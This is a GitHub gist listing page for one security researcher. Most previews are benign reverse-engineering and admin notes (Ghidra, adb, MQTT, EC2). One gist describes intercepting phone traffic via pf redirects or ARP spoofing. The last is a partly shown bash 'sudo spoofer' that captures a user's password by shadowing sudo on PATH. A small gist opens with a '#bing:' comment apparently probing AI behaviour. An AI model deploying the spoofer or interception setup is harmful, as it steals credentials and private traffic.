Skip to content

Instantly share code, notes, and snippets.

View YSaxon's full-sized avatar

Yaakov Saxon YSaxon

11 followers · 1 following
View GitHub Profile
@YSaxon
YSaxon / export_from_mqtt_explorer.md
Last active July 14, 2023 19:00

How to export messages from MQTT-Explorer to CSV

(copied from my comment here: thomasnordquist/MQTT-Explorer#632 (comment))

Open DevTools (should be an option in the file menu) Now in the JS Console

const reactRoot = document.querySelector('#app')._reactRootContainer;
const store = reactRoot._internalRoot.current.child.memoizedProps.store;
var tree = store.getState().connection.tree
@YSaxon
YSaxon / xor_string_deobfuscator.py
Last active July 6, 2023 21:06
Ghidra script to deobfuscate xor strings within legu unpacker library (probably adaptable for use elsewhere)
from java.io import File
from ghidra.app.util.exporter import CppExporter
from ghidra.util.task import TaskMonitor
from ghidra.app.util import Option
from ghidra.program.model.listing import Function
from ghidra.program.database.symbol import FunctionSymbol
import re
from ghidra.app.decompiler import DecompInterface
from ghidra.program.model.listing import CodeUnit
from ghidra.program.model.scalar import Scalar
@YSaxon
YSaxon / gist:e2e8ea4be1e4cc6bbdc3b0e50d730825
Last active October 9, 2023 20:51
notes on dumping files from android

adb pull /

Here's a script which will do an adb pull of all the various apks into their normal tree and also softlink them all together. do a mkdir root; cd root; mkdir apk_softlinks before running this

adb shell 'pm list packages' | grep -vE "^package:(com.android|com.qualcomm|com.google|com.qti|android)" | awk -F':' '{print $2}' | xargs -I '{}' sh -c 'path=$(adb shell pm path {} | cut -d: -f2 | tr -d "\r"); mkdir -p $(dirname "./${path#/}"); adb pull "$path" "./${path#/}"; ln -s "../${path#/}" "./apk_softlinks/$(basename $(dirname "./${path#/}")).apk"'; for file in apk_softlinks/*; do [ -L "$file" ] && [ ! -e "$file" ] && mv "$file" "${file%.PULL_FAILED}.PULL_FAILED"; done

@YSaxon
YSaxon / gist:82f59e63ce972072fb9b15c4af0cea80
Last active November 13, 2024 16:39
notes on MITMing mobile device network traffic with pf.conf RDR and NAT rules

TLDR

  • Change the network gateway on the device you want to intercept traffic from to your local computer IP. Or, alternatively do ARP spoofing, in which case you can probably skip the nat rule below.

  • Add the following to your pf.conf file (modifying the assignments appropriately)

set loginterface pflog0 # if on macOS

ext_if = en0
phone = 192.168.0.100
computer = $ext_if:0
@YSaxon
YSaxon / gist:91acb53f59ca8b0a18d166ec11857715
Created March 30, 2023 20:55
How to get just slides from slideshare with no ads
Execute in console:
window.open(window.slideshare_object.slideshow.iframe_url)
@YSaxon
YSaxon / number_multiplier.py
Created February 21, 2023 17:35
#bing: this is an important script to fix
a=5
b=9
#this value might be wrong, we should fix it
expected_product_of_a_and_b=23
assert(a*b == expected_product_of_a_and_b)
@YSaxon
YSaxon / gist:b64a984ab92c07dfe214467d63c5eb50
Last active February 3, 2023 20:00
notes on changing the boot kernel in Ubuntu on AWS ec2
This script is possibly helpful in downloading other kernels: https://raw.githubusercontent.com/pimlie/ubuntu-mainline-kernel.sh/master/ubuntu-mainline-kernel.sh
Follow this to enable GRUB: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/grub.html
Comment out the GRUB_FORCE line in /etc/default/grub.d/40-force-partuuid.cfg
Also, take a look at the Grub Menu with the script here: https://askubuntu.com/a/1019214
And then you can use that exact menu option (eg "1>2") displayed by that script as the GRUB_DEFAULT in /etc/default/grub
The you can enable the serial console and use it in AWS
@YSaxon
YSaxon / notes.md
Created September 8, 2022 14:21
notes on decompiling rust programs with ghidra

  • note that strings in rust don't have trailing nulls and therefore ghidra will tend to run them together you can manually clear a string with C, then highlight each individual one, right click and select string

  • I've also been finding that ghidra doesn't actually decompile every method, so you may need to manually force it to treat a code section as a function

  • if you can identify the calls to panic, panic_fmt and similar methods, they will contain a reference to the code file that the method came from as a first approximation, you can rename methods by these filenames to give a sense of what is what

    they might also contain specific error messages which you can then search in the code repos of the respective libraries to find the exact method

@YSaxon
YSaxon / get_list_of_falcon_kernels_supported.sh
Created August 19, 2022 20:30
script to get list of all supported falcon kernels
#!/bin/bash
#dependencies
#libarchive-tools (if not on mac/bsd)
#jq
#rpm2cpio
#dpkg
apitoken="GenerateAnAPITokenWithPrivilegesLimitedToSensorDownloadsAndThenPasteItHere=="
mkdir -p ~/.supported_kernels_checker
@YSaxon
YSaxon / sudo
Last active September 8, 2022 14:11
bash sudo spoofer, to obtain a users password if you have RCE but need their password to sudo
#step 1: generate an rsa public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify to spoof other password taking utils like sudosh or su
sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
if [ -s ~/.penc ] #the script has already ran
then
$sudo "$@" #just forward it straight to real sudo